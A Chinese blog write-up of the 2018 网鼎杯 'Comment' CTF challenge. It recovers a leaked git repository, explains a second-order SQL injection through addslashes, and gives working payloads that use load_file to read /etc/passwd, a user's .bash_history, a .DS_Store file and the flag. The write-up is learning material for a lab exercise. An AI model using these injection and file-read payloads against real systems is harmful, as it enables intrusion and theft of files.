• [网鼎杯 2018]Comment git泄露 / 恢复 二次注入 .DS_Store bash_history文件查看

    首先我们看到账号密码有提示了

    我们bp爆破一下

    我首先对数字爆破 因为全字符的话太多了

    爆出来了哦

    所以账号密码也出来了

    1. zhangwei
    2. zhangwei666

    没有什么用啊

    扫一下吧

    git

    git泄露

    那泄露看看

    真有

    2. include "mysql.php";
    3. session_start();
    4. if($_SESSION['login'] != 'yes'){
    5.     header("Location: ./login.php");
    6.     die();
    7. }
    8. if(isset($_GET['do'])){
    9. switch ($_GET['do'])
    10. {
    11. case 'write':
    12.     break;
    13. case 'comment':
    14.     break;
    15. default:
    16.     header("Location: ./index.php");
    17. }
    18. }
    19. else{
    20.     header("Location: ./index.php");
    21. }
    22. ?>

    原本的githack坏了

    mirrors / BugScanTeam / GitHack · GitCode

    重新下了一个 需要下载后 里面存在 .git文件夹

    然后看上面的代码 根本没有看懂 感觉不是全部

    git 恢复

    所以我们可以使用git log --all看看

    以前的情况

     我们直接回到最开始

    git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c
    2. include "mysql.php";
    3. session_start();
    4. if($_SESSION['login'] != 'yes'){
    5.     header("Location: ./login.php");
    6.     die();
    7. }
    8. if(isset($_GET['do'])){
    9. switch ($_GET['do'])
    10. {
    11. case 'write':
    12.     $category = addslashes($_POST['category']);
    13.     $title = addslashes($_POST['title']);
    14.     $content = addslashes($_POST['content']);
    15.     $sql = "insert into board
    16.             set category = '$category',
    17.                 title = '$title',
    18.                 content = '$content'";
    19.     $result = mysql_query($sql);
    20.     header("Location: ./index.php");
    21.     break;
    22. case 'comment':
    23.     $bo_id = addslashes($_POST['bo_id']);
    24.     $sql = "select category from board where id='$bo_id'";
    25.     $result = mysql_query($sql);
    26.     $num = mysql_num_rows($result);
    27.     if($num>0){
    28.     $category = mysql_fetch_array($result)['category'];
    29.     $content = addslashes($_POST['content']);
    30.     $sql = "insert into comment
    31.             set category = '$category',
    32.                 content = '$content',
    33.                 bo_id = '$bo_id'";
    34.     $result = mysql_query($sql);
    35.     }
    36.     header("Location: ./comment.php?id=$bo_id");
    37.     break;
    38. default:
    39.     header("Location: ./index.php");
    40. }
    41. }
    42. else{
    43.     header("Location: ./index.php");
    44. }
    45. ?>

    全部代码就出来了

    用了个switch 内容为go

    1. addslashes  这里是 通过转义的方式 存入数据库 很容易造成二次注入
    2.  
    3. 因为会把内容原封不动传入数据库 
    4.  
    5. 如果读取 就会造成二次注入
    1. case 'comment':
    2.     $bo_id = addslashes($_POST['bo_id']);
    3.     $sql = "select category from board where id='$bo_id'";
    4.     $result = mysql_query($sql);
    5.     $num = mysql_num_rows($result);
    6.  
    7. 这里我们能发现 查询的内容 是 category
    8.  
    9.  
    10. 所以category 就是我们写入的内容的参数了

    这里懂得差不多了

    1.     $bo_id = addslashes($_POST['bo_id']);
    2.     $sql = "select category from board where id='$bo_id'";
    3.     $result = mysql_query($sql);
    4.     $num = mysql_num_rows($result);
    5.     if($num>0){
    6.     $category = mysql_fetch_array($result)['category'];
    7. 主要是这里 设定了从数据库提取出来的值
    8.  
    9.     $content = addslashes($_POST['content']);
    10.     $sql = "insert into comment
    11.             set category = '$category',
    12.                 content = '$content',
    13.                 bo_id = '$bo_id'";
    14.     $result = mysql_query($sql);
    15.  
    16.  
    17. 这里我们就可以构造了
    18.  
    19. $category=0' content = database(),/*    后面的/*是用来和我们详情里面输入的content闭合
    20.

    我们首先写入留言

    0',content=database(),/*

    然后进去提交留言

    这个时候就会形成

    1.    $sql = "insert into comment
    2.             set category = '0',content = database(),/*',
    3.                 content = '*/#',
    4.                 bo_id = '$bo_id'";
    5.     $result = mysql_query($sql);
    6.  
    7.  
    8. 更直观点
    9.  
    10.  
    11.    $sql = "insert into comment
    12.             set category = '0',content = database(),/*',content = '*/#',
    13.                 bo_id = '$bo_id'";
    14.  
    15.  
    16.  
    17. /*',content = '*/#'
    18.  
    19.  
    20. 这里就为空了 所以现在的语句是
    21.  
    22. set category = '0',content = database(),
    23.                 bo_id = '$bo_id'";
    24.

    然后我们进行查表 发现没有flag

    于是我们可以看看user()函数

    发现是root权限

    那么多半就是 读取了

    load_file可以读取

    我们读取看看

    这里又是另一个文件读取的方法了

    之前做的题 proc这里没有用

    任意文件读取

    .bash_history      

    我们首先去查看 etc/passwd

    0',content=(select load_file('/etc/passwd')),/*

    发现存在 www用户 我们去看看他的历史命令

    0',content=(select load_file('/home/www/.bash_history')),/*

    这里发现了 是删除了 .DS_Store

    但是ctf环境一般都是docker环境 所以在

    /tmp/html下还会存在

    我们去读取

    1. 0',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
    4. 这里需要通过十六进制输出 因为会有很多不可见的字符

     .DS_Store泄露

    我们通过通过瑞士军刀可以 恢复成 文件形式 并且导出

    然后通过 Python-dsstore-master

    来实现解析读取文件

    py3 .\main.py .\samples\download.dat

    我们来解析读取这个flag

    0',content=(select load_file('/tmp/html/flag_8946e1ff1ee3e40f.php')),/*

     但是这个文件是错误的 flag为错误

    可能修改了 所以我们回去 /var进行读取

    0',content=(select load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')),/*
    flag{5737c889-1e5b-47a6-b14d-87df5dd59e01}

    知识点 过多了。。。。。

    虽然都很基础 但是有的时候 真没想到 可以以后再做一次

  • 相关阅读:
    精通Spring Boot单元测试:构建健壮的Java应用
    鸿鹄工程项目管理系统em Spring Cloud+Spring Boot+前后端分离构建工程项目管理系统
    8.10 - 软件运维
    Unity 代码控制Text文本换行
    一套轻量、安全的问卷系统基座,提供面向个人和企业的一站式产品级解决方案
    win10 系统重装 (官方纯净版,无预置应用)
    《SpringBoot篇》02.SpringBoot程序的打包与运行(jar包的运行原理)
    Javascript知识【基础语法】
    基于模板匹配算法的交通标志识别(MATLAB源码)
    arcgis 线转面如何保留线的属性?
  • 原文地址:https://blog.csdn.net/m0_64180167/article/details/133715695